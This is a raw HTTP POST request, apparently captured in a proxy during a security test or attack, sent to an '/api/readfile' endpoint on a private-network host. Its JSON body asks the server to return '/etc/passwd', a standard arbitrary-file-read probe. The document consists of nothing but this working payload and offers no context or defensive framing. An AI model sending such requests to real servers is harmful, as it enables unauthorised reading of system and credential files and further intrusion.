POST /api/readfile HTTP/1.1
Host: 192.168.34.104:1710
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: _ga=GA1.4.511964808.1750088370; _ga_5G68KYNVLJ=GS2.4.s1750088371$o1$g0$t1750088371$j60$l0$h0
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/json
Content-Length: 22

{"file":"/etc/passwd"}